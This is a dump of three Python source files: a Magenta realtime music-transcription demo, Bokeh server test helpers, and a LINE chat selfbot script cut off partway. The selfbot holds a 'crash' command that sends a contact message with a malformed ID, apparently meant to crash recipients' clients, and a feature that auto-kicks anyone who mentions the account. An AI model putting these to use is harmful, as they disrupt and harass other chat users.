source
stringlengths
3
86
python
stringlengths
75
1.04M
onsets_frames_transcription_realtime.py
# Copyright 2020 The Magenta Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 """Experimental realtime transcription demo.""" import multiprocessing import threading from absl import app from absl import flags import attr from colorama import Fore # noqa from colorama import Style # noqa from magenta.models.onsets_frames_transcription.realtime import audio_recorder from magenta.models.onsets_frames_transcription.realtime import tflite_model import numpy as np flags.DEFINE_string('model_path', 'onsets_frames_wavinput.tflite', 'File path of TFlite model.') flags.DEFINE_string('mic', None, 'Optional: Input source microphone ID.') flags.DEFINE_float('mic_amplify', 30.0, 'Multiply raw audio mic input') flags.DEFINE_string( 'wav_file', None, 'If specified, will decode the first 10 seconds of this wav file.') flags.DEFINE_integer( 'sample_rate_hz', 16000, 'Sample Rate. The model expects 16000. However, some microphones do not ' 'support sampling at this rate. In that case use --sample_rate_hz 48000 and' 'the code will automatically downsample to 16000') FLAGS = flags.FLAGS class TfLiteWorker(multiprocessing.Process): """Process for executing TFLite inference.""" def __init__(self, model_path, task_queue, result_queue): multiprocessing.Process.__init__(self) self._model_path = model_path self._task_queue = task_queue self._result_queue = result_queue self._model = None def setup(self): if self._model is not None: return self._model = tflite_model.Model(model_path=self._model_path) def run(self): self.setup() while True: task = self._task_queue.get() if task is None: self._task_queue.task_done() return task(self._model) self._task_queue.task_done() self._result_queue.put(task) @attr.s class AudioChunk(object): serial = attr.ib() samples = attr.ib(repr=lambda w: '{} {}'.format(w.shape, w.dtype)) class AudioQueue(object): """Audio queue.""" def __init__(self, callback, audio_device_index, sample_rate_hz, model_sample_rate, frame_length, overlap): # Initialize recorder. downsample_factor = sample_rate_hz / model_sample_rate self._recorder = audio_recorder.AudioRecorder( sample_rate_hz, downsample_factor=downsample_factor, device_index=audio_device_index) self._frame_length = frame_length self._overlap = overlap self._audio_buffer = np.array([], dtype=np.int16).reshape(0, 1) self._chunk_counter = 0 self._callback = callback def start(self): """Start processing the queue.""" with self._recorder: timed_out = False while not timed_out: assert self._recorder.is_active new_audio = self._recorder.get_audio(self._frame_length - len(self._audio_buffer)) audio_samples = np.concatenate( (self._audio_buffer, new_audio[0] * FLAGS.mic_amplify)) # Extract overlapping first_unused_byte = 0 for pos in range(0, audio_samples.shape[0] - self._frame_length, self._frame_length - self._overlap): self._callback( AudioChunk(self._chunk_counter, audio_samples[pos:pos + self._frame_length])) self._chunk_counter += 1 first_unused_byte = pos + self._frame_length # Keep the remaining bytes for next time self._audio_buffer = audio_samples[first_unused_byte:] # This actually executes in each worker thread! class OnsetsTask(object): """Inference task.""" def __init__(self, audio_chunk: AudioChunk): self.audio_chunk = audio_chunk self.result = None def __call__(self, model): samples = self.audio_chunk.samples[:, 0] self.result = model.infer(samples) self.timestep = model.get_timestep() def result_collector(result_queue): """Collect and display results.""" def notename(n, space): if space: return [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '][n % 12] return [ Fore.BLUE + 'A' + Style.RESET_ALL, Fore.LIGHTBLUE_EX + 'A#' + Style.RESET_ALL, Fore.GREEN + 'B' + Style.RESET_ALL, Fore.CYAN + 'C' + Style.RESET_ALL, Fore.LIGHTCYAN_EX + 'C#' + Style.RESET_ALL, Fore.RED + 'D' + Style.RESET_ALL, Fore.LIGHTRED_EX + 'D#' + Style.RESET_ALL, Fore.YELLOW + 'E' + Style.RESET_ALL, Fore.WHITE + 'F' + Style.RESET_ALL, Fore.LIGHTBLACK_EX + 'F#' + Style.RESET_ALL, Fore.MAGENTA + 'G' + Style.RESET_ALL, Fore.LIGHTMAGENTA_EX + 'G#' + Style.RESET_ALL, ][n % 12] # + str(n//12) print('Listening to results..') # TODO(mtyka) Ensure serial stitching of results (no guarantee that # the blocks come in in order but they are all timestamped) while True: result = result_queue.get() serial = result.audio_chunk.serial result_roll = result.result if serial > 0: result_roll = result_roll[4:] for notes in result_roll: for i in range(6, len(notes) - 6): note = notes[i] is_frame = note[0] > 0.0 notestr = notename(i, not is_frame) print(notestr, end='') print('|') def main(argv): if len(argv) > 1: raise app.UsageError('Too many command-line arguments.') results = multiprocessing.Queue() results_thread = threading.Thread(target=result_collector, args=(results,)) results_thread.start() model = tflite_model.Model(model_path=FLAGS.model_path) overlap_timesteps = 4 overlap_wav = model.get_hop_size( ) * overlap_timesteps + model.get_window_length() if FLAGS.wav_file: wav_data = open(FLAGS.wav_file, 'rb').read() samples = audio_recorder.wav_data_to_samples(wav_data, model.get_sample_rate()) samples = samples[:model.get_sample_rate() * 10] # Only the first 10 seconds samples = samples.reshape((-1, 1)) samples_length = samples.shape[0] # Extend samples with zeros samples = np.pad( samples, (0, model.get_input_wav_length()), mode='constant') for i, pos in enumerate( range(0, samples_length - model.get_input_wav_length() + overlap_wav, model.get_input_wav_length() - overlap_wav)): chunk = samples[pos:pos + model.get_input_wav_length()] task = OnsetsTask(AudioChunk(i, chunk)) task(model) results.put(task) else: tasks = multiprocessing.JoinableQueue() # Make and start the workers num_workers = 4 workers = [ TfLiteWorker(FLAGS.model_path, tasks, results) for i in range(num_workers) ] for w in workers: w.start() audio_feeder = AudioQueue( callback=lambda audio_chunk: tasks.put(OnsetsTask(audio_chunk)), audio_device_index=FLAGS.mic if FLAGS.mic is None else int(FLAGS.mic), sample_rate_hz=int(FLAGS.sample_rate_hz), model_sample_rate=model.get_sample_rate(), frame_length=model.get_input_wav_length(), overlap=overlap_wav) audio_feeder.start() def console_entry_point(): app.run(main) if __name__ == '__main__': console_entry_point()
test_utils.py
from __future__ import absolute_import import uuid import tempfile import threading import time import unittest import mock #import redis import requests from requests.exceptions import ConnectionError from tornado import ioloop #import zmq from bokeh.tests.test_utils import skipIfPy3 from ..models import user from .. import start, configure from ..app import bokeh_app, app from ..settings import settings as server_settings def wait_flask(): def helper(): try: return requests.get('http://localhost:5006/bokeh/ping') except ConnectionError: return False return wait_until(helper) def wait_redis_gone(port): def helper(): client = redis.Redis(port=port) try: client.ping() return False except redis.ConnectionError: return True return wait_until(helper) def wait_redis_start(port): def helper(): client = redis.Redis(port=port) try: return client.ping() except redis.ConnectionError: pass return wait_until(helper) def wait_until(func, timeout=1.0, interval=0.01): st = time.time() while True: if func(): return True if (time.time() - st) > timeout: return False time.sleep(interval) def recv_timeout(socket, timeout): poll = zmq.Poller() poll.register(socket, zmq.POLLIN) socks = dict(poll.poll(timeout=timeout)) if socks.get(socket, None) == zmq.POLLIN: return socket.recv_multipart() else: return None class BaseBokehServerTestCase(unittest.TestCase): options = {} class MemoryBokehServerTestCase(BaseBokehServerTestCase): @skipIfPy3("gevent does not work in py3.") def setUp(self): #clear tornado ioloop instance server_settings.reset() server_settings.model_backend = {'type' : 'memory'} for k,v in self.options.items(): setattr(server_settings, k, v) bokeh_app.stdout = None bokeh_app.stderr = None self.serverthread = threading.Thread(target=start.start_simple_server) self.serverthread.start() wait_flask() #not great - but no good way to wait for zmq to come up time.sleep(0.1) make_default_user(bokeh_app) def tearDown(self): start.stop() self.serverthread.join() BokehServerTestCase = MemoryBokehServerTestCase def make_default_user(bokeh_app): bokehuser = user.new_user(bokeh_app.servermodel_storage, "defaultuser", str(uuid.uuid4()), apikey='nokey', docs=[]) return bokehuser class FlaskClientTestCase(BaseBokehServerTestCase): def setUp(self): server_settings.reset() for k,v in self.options.items(): setattr(server_settings, k, v) server_settings.model_backend = {'type' : 'memory'} configure.configure_flask() with mock.patch('bokeh.utils.logging'): configure.register_blueprint() #ugh..need better way to initialize this app.secret_key = server_settings.secret_key app.debug = True self.client = app.test_client() def tearDown(self): pass
puyself.py
cl = GYE.LINE() cl.login(token="") cl.loginResult() print "\n[CIE LOGIN CIEEEE]" reload(sys) sys.setdefaultencoding('utf-8') helpmsg ="""╠═════════════════ ╠-> Restart ╠-> Mention ╠-> setpoint on/off ╠-> viewlastseen ╠-> Ulti @ ╠-> Speed ╠-> Time ╠-> Friendlist ╠-> id@en ╠-> en@id ╠-> id@jp\n 「+」\n╠-> help protect\n╠-> help self\n╠-> help set\n╠-> help grup\n╠-> help translate ╚═════════════════""" helppro =""" ╠═════════════════ ╠-> protect on/off ╠-> qr on/off ╠-> invite on/off ╠-> cancel on/off ╚═════════════════""" helpmedia =""" ╠═════════════════ ╠-> google (text) ╠-> playstore (text) ╠-> Profileig (username) ╠-> instagram (username) ╠-> wikipedia (text) ╠-> idline (text) ╠-> ytsearch (text) ╠-> Image (text) ╠-> Zodiak tanggal-bulan-tahun ╠-> lirik (text) ╚═════════════════""" helpself =""" ╠═════════════════ ╠-> Me ╠-> Myname: ╠-> Mybio: ╠-> Mypict ╠-> Mycover ╠-> My copy @ ╠-> My backup ╠-> Getgroup image ╠-> Getmid @ ╠-> Getcontact @ ╠-> Getprofile @ ╠-> Getinfo @ ╠-> Getname @ ╠-> Getbio @ ╠-> Getpict @ ╠-> Getcover @ ╠-> Mention ╠-> setpoint on/off ╠-> viewlastseen ╠-> Micadd @ ╠-> Micdel @ ╚═════════════════""" helpset =""" ╠═════════════════ ╠-> qr on/off ╠-> protect on/off ╠-> contact on/off ╠-> autojoin on/off ╠-> auto leave on/off ╠-> cancel on/off ╠-> invite on/off ╠-> autoadd on/off ╠-> like friend ╠-> link on ╠-> respon on/off ╠-> read on/off ╠-> simisimi on/off ╚═════════════════""" helpgrup =""" ╠═════════════════ ╠-> Link on ╠-> Url ╠-> Cancel ╠-> Gcreator ╠-> Kick @ ╠-> Ulti @ ╠-> Gname: ╠-> Gbroadcast: ╠-> Cbroadcast: ╠-> Infogrup ╠-> Gruplist ╠-> Friendlist ╠-> Blacklist ╠-> Ban @ ╠-> Unban @ ╠-> Clearban ╠-> Banlist ╠-> Contact ban ╠-> Midban ╚═════════════════""" helptranslate =""" ╠═════════════════ ╠-> Id@en ╠-> En@id ╠-> Id@jp ╠-> Jp@id ╠-> Id@th ╠-> Th@id ╠-> Id@ar ╠-> Ar@id ╠-> Id@ko ╠-> Ko@id ╠-> Say-id ╠-> Say-en ╠-> Say-jp ╚═════════════════""" KAC=[cl] mid = cl.getProfile().mid Bots=[mid] admin=["uac8e3eaf1eb2a55770bf10c3b2357c33"] wait = { "likeOn":False, "alwayRead":False, "detectMention":True, "kickMention":False, "steal":True, 'pap':{}, 'invite':{}, "spam":{}, 'contact':False, 'autoJoin':True, 'autoCancel':{"on":False,"members":5}, 'leaveRoom':True, 'timeline':False, 'autoAdd':True, 'message':"""Thx for add""", "lang":"JP", "comment":"", "commentOn":False, "commentBlack":{}, "wblack":False, "dblack":False, "clock":False, "cNames":"", "cNames":"", "blacklist":{}, "wblacklist":False, "dblacklist":False, "protect":False, "cancelprotect":False, "inviteprotect":False, "linkprotect":False, } wait2 = { "readPoint":{}, "readMember":{}, "setTime":{}, "ROM":{} } mimic = { "copy":False, "copy2":False, "status":False, "target":{} } settings = { "simiSimi":{} } res = { 'num':{}, 'us':{}, 'au':{}, } setTime = {} setTime = wait2['setTime'] mulai = time.time() contact = cl.getProfile() backup = cl.getProfile() backup.displayName = contact.displayName backup.statusMessage = contact.statusMessage backup.pictureStatus = contact.pictureStatus def restart_program(): python = sys.executable os.execl(python, python, * sys.argv) def download_page(url): version = (3,0) cur_version = sys.version_info if cur_version >= version: #If the Current Version of Python is 3.0 or above import urllib,request #urllib library for Extracting web pages try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" req = urllib,request.Request(url, headers = headers) resp = urllib,request.urlopen(req) respData = str(resp.read()) return respData except Exception as e: print(str(e)) else: #If the Current Version of Python is 2.x import urllib2 try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17" req = urllib2.Request(url, headers = headers) response = urllib2.urlopen(req) page = response.read() return page except: return"Page Not found" #Finding 'Next Image' from the given raw page def _images_get_next_item(s): start_line = s.find('rg_di') if start_line == -1: #If no links are found then give an error! end_quote = 0 link = "no_links" return link, end_quote else: start_line = s.find('"class="rg_meta"') start_content = s.find('"ou"',start_line+90) end_content = s.find(',"ow"',start_content-90) content_raw = str(s[start_content+6:end_content-1]) return content_raw, end_content def sendAudio(self, to, path): objectId = self.sendMessage(to=to, text=None, contentType = 3).id files = { 'file': open(path, 'rb'), } params = { 'name': 'media', 'oid': objectId, 'size': len(open(path, 'rb').read()), 'type': 'audio', 'ver': '1.0', } data = { 'params': json.dumps(params) } r = self.server.postContent(self.server.LINE_OBS_DOMAIN + '/talk/m/upload.nhn', data=data, files=files) if r.status_code != 201: raise Exception('Upload audio failure.') return True def sendAudio(self, to_, path): M = Message(to=to_,contentType = 3) M.contentMetadata = None M.contentPreview = None M_id = self.Talk.client.sendMessage(0,M).id files = { 'file': open(path, 'rb'), } params = { 'name': 'media', 'oid': M_id, 'size': len(open(path, 'rb').read()), 'type': 'audio', 'ver': '1.0', } data = { 'params': json.dumps(params) } r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files) if r.status_code != 201: raise Exception('Upload image failure.') return True def sendAudioWithURL(self, to_, url): path = 'pythonLiness.data' r = requests.get(url, stream=True) if r.status_code == 200: with open(path, 'w') as f: shutil.copyfileobj(r.raw, f) else: raise Exception('Download Audio failure.') try: self.sendAudio(to_, path) except Exception as e: raise e #Getting all links with the help of '_images_get_next_image' def _images_get_all_items(page): items = [] while True: item, end_content = _images_get_next_item(page) if item == "no_links": break else: items.append(item) #Append all the links in the list named 'Links' time.sleep(0.1) #Timer could be used to slow down the request for image downloads page = page[end_content:] return items def download_page(url): version = (3,0) cur_version = sys.version_info if cur_version >= version: #If the Current Version of Python is 3.0 or above import urllib,request #urllib library for Extracting web pages try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" req = urllib,request.Request(url, headers = headers) resp = urllib,request.urlopen(req) respData = str(resp.read()) return respData except Exception as e: print(str(e)) else: #If the Current Version of Python is 2.x import urllib2 try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17" req = urllib2.Request(url, headers = headers) response = urllib2.urlopen(req) page = response.read() return page except: return"Page Not found" def upload_tempimage(client): ''' Upload a picture of a kitten. We don't ship one, so get creative! ''' config = { 'album': album, 'name': 'bot auto upload', 'title': 'bot auto upload', 'description': 'bot auto upload' } print("Uploading image... ") image = client.upload_from_path(image_path, config=config, anon=False) print("Done") print() def summon(to, nama): aa = "" bb = "" strt = int(14) akh = int(14) nm = nama for mm in nm: akh = akh + 2 aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},""" strt = strt + 6 akh = akh + 4 bb += "\xe2\x95\xa0 @x \n" aa = (aa[:int(len(aa)-1)]) msg = Message() msg.to = to msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90" msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'} print "[Command] Tag All" try: cl.sendMessage(msg) except Exception as error: print error def waktu(secs): mins, secs = divmod(secs,60) hours, mins = divmod(mins,60) return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs) def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX... tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"] for texX in tex: for command in commands: if string ==command: return True return False def sendMessage(to, text, contentMetadata={}, contentType=0): mes = Message() mes.to, mes.from_ = to, profile.mid mes.text = text mes.contentType, mes.contentMetadata = contentType, contentMetadata if to not in messageReq: messageReq[to] = -1 messageReq[to] += 1 def bot(op): try: if op.type == 0: return if op.type == 5: if wait["autoAdd"] == True: cl.findAndAddContactsByMid(op.param1) if (wait["message"] in [""," ","\n",None]): pass else: cl.sendText(op.param1,str(wait["message"])) if op.type == 26: msg = op.message if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True: text = msg.text if text is not None: cl.sendText(msg.to,text) if op.type == 19: if mid in op.param3: wait["blacklist"][op.param2] = True if op.type == 22: if wait["leaveRoom"] == True: cl.leaveRoom(op.param1) if op.type == 24: if wait["leaveRoom"] == True: cl.leaveRoom(op.param1) if op.type == 26: msg = op.message if msg.toType == 0: msg.to = msg.from_ if msg.from_ == mid: if "join:" in msg.text: list_ = msg.text.split(":") try: cl.acceptGroupInvitationByTicket(list_[1],list_[2]) G = cl.getGroup(list_[1]) G.preventJoinByTicket = True cl.updateGroup(G) except: cl.sendText(msg.to,"error") if msg.toType == 1: if wait["leaveRoom"] == True: cl.leaveRoom(msg.to) if msg.contentType == 16: url = msg.contentMetadata["postEndUrl"] cl.like(url[25:58], url[66:], likeType=1001) if op.type == 26: msg = op.message if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True: text = msg.text if text is not None: cl.sendText(msg.to,text) if op.type == 26: msg = op.message if msg.to in settings["simiSimi"]: if settings["simiSimi"][msg.to] == True: if msg.text is not None: text = msg.text r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt") data = r.text data = json.loads(data) if data['status'] == 200: if data['result']['result'] == 100: cl.sendText(msg.to, "[From Simi]\n" + data['result']['response'].encode('utf-8')) if 'MENTION' in msg.contentMetadata.keys() != None: if wait["detectMention"] == True: contact = cl.getContact(msg.from_) cName = contact.displayName balas = ["",cName + " what ?, ", cName + " Kenapa? pc dia aja klo penting, " + cName + "?", "Ada Perlu apa? jgn tag doang, " + cName + "?","Hmm?, ", "Jgn tag tag ah, "] ret_ = "." + random.choice(balas) name = re.findall(r'@(\w+)', msg.text) mention = ast.literal_eval(msg.contentMetadata['MENTION']) mentionees = mention['MENTIONEES'] for mention in mentionees: if mention['M'] in Bots: cl.sendText(msg.to,ret_) break if 'MENTION' in msg.contentMetadata.keys() != None: if wait["kickMention"] == True: contact = cl.getContact(msg.from_) cName = contact.displayName balas = ["",cName + " Ngapain Ngetag?, ", cName + " Kenapa Tag saya?, " + cName + "?", "Ada Perlu apa, " + cName + "?","Tag doang tidak perlu., ", "Tersummon -_-, "] ret_ = "**Auto Respond** " + random.choice(balas) name = re.findall(r'@(\w+)', msg.text) mention = ast.literal_eval(msg.contentMetadata['MENTION']) mentionees = mention['MENTIONEES'] for mention in mentionees: if mention['M'] in Bots: cl.sendText(msg.to,ret_) cl.kickoutFromGroup(msg.to,[msg.from_]) break if msg.contentType == 13: if wait['invite'] == True: _name = msg.contentMetadata["displayName"] invite = msg.contentMetadata["mid"] groups = cl.getGroup(msg.to) pending = groups.invitee targets = [] for s in groups.members: if _name in s.displayName: cl.sendText(msg.to, _name + " Berada DiGrup Ini") else: targets.append(invite) if targets == []: pass else: for target in targets: try: cl.findAndAddContactsByMid(target) cl.inviteIntoGroup(msg.to,[target]) cl.sendText(msg.to,"Invite " + _name) wait['invite'] = False break except: cl.sendText(msg.to,"Error") wait['invite'] = False break #if msg.contentType == 13: # if wait["steal"] == True: # _name = msg.contentMetadata["displayName"] # copy = msg.contentMetadata["mid"] # groups = cl.getGroup(msg.to) # pending = groups.invitee # targets = [] # for s in groups.members: # if _name in s.displayName: # print "[Target] Stealed" # break # else: # targets.append(copy) # if targets == []: # pass # else: # for target in targets: # try: # cl.findAndAddContactsByMid(target) # contact = cl.getContact(target) # cu = cl.channel.getCover(target) # path = str(cu) # image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus # cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + msg.contentMetadata["mid"] + "\n\nBio :\n" + contact.statusMessage) # cl.sendText(msg.to,"Profile Picture " + contact.displayName) # cl.sendImageWithURL(msg.to,image) # cl.sendText(msg.to,"Cover " + contact.displayName) # cl.sendImageWithURL(msg.to,path) # wait["steal"] = False # break # except: # pass if wait["alwayRead"] == True: if msg.toType == 0: cl.sendChatChecked(msg.from_,msg.id) else: cl.sendChatChecked(msg.to,msg.id) if op.type == 25: msg = op.message if msg.contentType == 13: if wait["wblack"] == True: if msg.contentMetadata["mid"] in wait["commentBlack"]: cl.sendText(msg.to,"In Blacklist") wait["wblack"] = False else: wait["commentBlack"][msg.contentMetadata["mid"]] = True wait["wblack"] = False cl.sendText(msg.to,"Nothing") elif wait["dblack"] == True: if msg.contentMetadata["mid"] in wait["commentBlack"]: del wait["commentBlack"][msg.contentMetadata["mid"]] cl.sendText(msg.to,"Done") wait["dblack"] = False else: wait["dblack"] = False cl.sendText(msg.to,"Not in Blacklist") elif wait["wblacklist"] == True: if msg.contentMetadata["mid"] in wait["blacklist"]: cl.sendText(msg.to,"In Blacklist") wait["wblacklist"] = False else: wait["blacklist"][msg.contentMetadata["mid"]] = True wait["wblacklist"] = False cl.sendText(msg.to,"Done") elif wait["dblacklist"] == True: if msg.contentMetadata["mid"] in wait["blacklist"]: del wait["blacklist"][msg.contentMetadata["mid"]] cl.sendText(msg.to,"Done") wait["dblacklist"] = False else: wait["dblacklist"] = False cl.sendText(msg.to,"Done") elif wait["contact"] == True: msg.contentType = 0 cl.sendText(msg.to,msg.contentMetadata["mid"]) if 'displayName' in msg.contentMetadata: contact = cl.getContact(msg.contentMetadata["mid"]) try: cu = cl.channel.getCover(msg.contentMetadata["mid"]) except: cu = "" cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu)) else: contact = cl.getContact(msg.contentMetadata["mid"]) try: cu = cl.channel.getCover(msg.contentMetadata["mid"]) except: cu = "" cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu)) elif msg.contentType == 16: if wait["timeline"] == True: msg.contentType = 0 if wait["lang"] == "JP": msg.text = "menempatkan URL\n" + msg.contentMetadata["postEndUrl"] else: msg.text = msg.contentMetadata["postEndUrl"] cl.sendText(msg.to,msg.text) elif msg.text is None: return elif msg.text.lower() == 'help': if wait["lang"] == "JP": cl.sendText(msg.to,helpmsg) else: cl.sendText(msg.to,helpmsg) elif msg.text.lower() == 'help protect': if wait["lang"] == "JP": cl.sendText(msg.to,helppro) else: cl.sendText(msg.to,helppro) elif msg.text.lower() == 'help self': if wait["lang"] == "JP": cl.sendText(msg.to,helpself) else: cl.sendText(msg.to,helpself) elif msg.text.lower() == 'help grup': if wait["lang"] == "JP": cl.sendText(msg.to,helpgrup) else: cl.sendText(msg.to,helpgrup) elif msg.text.lower() == 'help set': if wait["lang"] == "JP": cl.sendText(msg.to,helpset) else: cl.sendText(msg.to,helpset) elif msg.text.lower() == 'help media': if wait["lang"] == "JP": cl.sendText(msg.to,helpmedia) else: cl.sendText(msg.to,helpmedia) elif msg.text.lower() == 'help translate': if wait["lang"] == "JP": cl.sendText(msg.to,helptranslate) else: cl.sendText(msg.to,helptranslate) #elif msg.text in ["Sp","Speed","speed"]: # start = time.time() # cl.sendText(msg.to, "「Come Here」") # elapsed_time = time.time() - start # cl.sendText(msg.to, "%sseconds" % (elapsed_time)) elif msg.text == ".Speed": cl.sendText(msg.to,"「Come Here」") start = time.time() for i in range(3000): 1+1 elsp = time.time() - start cl.sendText(msg.to,"%s/Detikี" % (elsp)) elif msg.text.lower() == 'crash': msg.contentType = 13 msg.contentMetadata = {'mid': "u1f41296217e740650e0448b96851a3e2',"} cl.sendMessage(msg) elif msg.text.lower() == 'me': msg.contentType = 13 msg.contentMetadata = {'mid': mid} cl.sendMessage(msg) elif ".fb" in msg.text: a = msg.text.replace(".fb","") b = urllib.quote(a) cl.sendText(msg.to,"「 Mencari 」\n" "Type:Mencari Info\nStatus: Proses") cl.sendText(msg.to, "https://www.facebook.com" + b) cl.sendText(msg.to,"「 Mencari 」\n" "Type:Mencari Info\nStatus: Sukses") #========================== FOR COMMAND BOT STARTING =============================# elif msg.text.lower() == 'contact on': if wait["contact"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση") else: cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση") else: wait["contact"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση") else: cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση") elif msg.text.lower() == 'contact off': if wait["contact"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ σƒƒ") else: cl.sendText(msg.to,"ɕσηϯαɕϯ αʆɾεαδψ σƒƒ") else: wait["contact"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ σƒƒ") else: cl.sendText(msg.to,"ɕσηϯαɕϯ αʆɾεαδψ σƒƒ") elif msg.text.lower() == 'protect on': if wait["protect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Protecion Already On") else: cl.sendText(msg.to,"Protecion Already On") else: wait["protect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Protecion Already On") else: cl.sendText(msg.to,"Protecion Already On") elif msg.text.lower() == 'qr on': if wait["linkprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Qr already On") else: cl.sendText(msg.to,"Protection Qr already On") else: wait["linkprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Qr already On") else: cl.sendText(msg.to,"Protection Qr already On") elif msg.text.lower() == 'invite on': if wait["inviteprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Invite already On") else: cl.sendText(msg.to,"Protection Invite already On") else: wait["inviteprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"ρяσтє¢тισи ιиνιтє ѕєт тσ σи") else: cl.sendText(msg.to,"ρяσтє¢тισи ιиνιтє αℓяєα∂у σи") elif msg.text.lower() == 'cancel on': if wait["cancelprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи") else: cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи") else: wait["cancelprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи") else: cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи") elif msg.text.lower() == 'autojoin on': if wait["autoJoin"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σи") else: cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σи") else: wait["autoJoin"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σи") else: cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σи") elif msg.text.lower() == 'autojoin off': if wait["autoJoin"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σff") else: cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σff") else: wait["autoJoin"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σff") else: cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σff") elif msg.text.lower() == 'protect off': if wait["protect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection already Off") else: cl.sendText(msg.to,"Protection already Off") else: wait["protect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"ρяσтє¢тισи ѕєт тσ σff") else: cl.sendText(msg.to,"ρяσтє¢тισи αℓяєα∂у σff") elif msg.text.lower() == 'qr off': if wait["linkprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Qr already off") else: cl.sendText(msg.to,"Protection Qr already off") else: wait["linkprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Qr already Off") else: cl.sendText(msg.to,"Protection Qr already Off") elif msg.text.lower() == 'invit off': if wait["inviteprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Invite already Off") else: cl.sendText(msg.to,"Protection Invite already Off") else: wait["inviteprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Invite already Off") else: cl.sendText(msg.to,"Protection Invite already Off") elif msg.text.lower() == 'cancel off': if wait["cancelprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Cancel already Off") else: cl.sendText(msg.to,"Protection Cancel already Off") else: wait["cancelprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Cancel already Off") else: cl.sendText(msg.to,"Protection Cancel already Off") elif "Grup 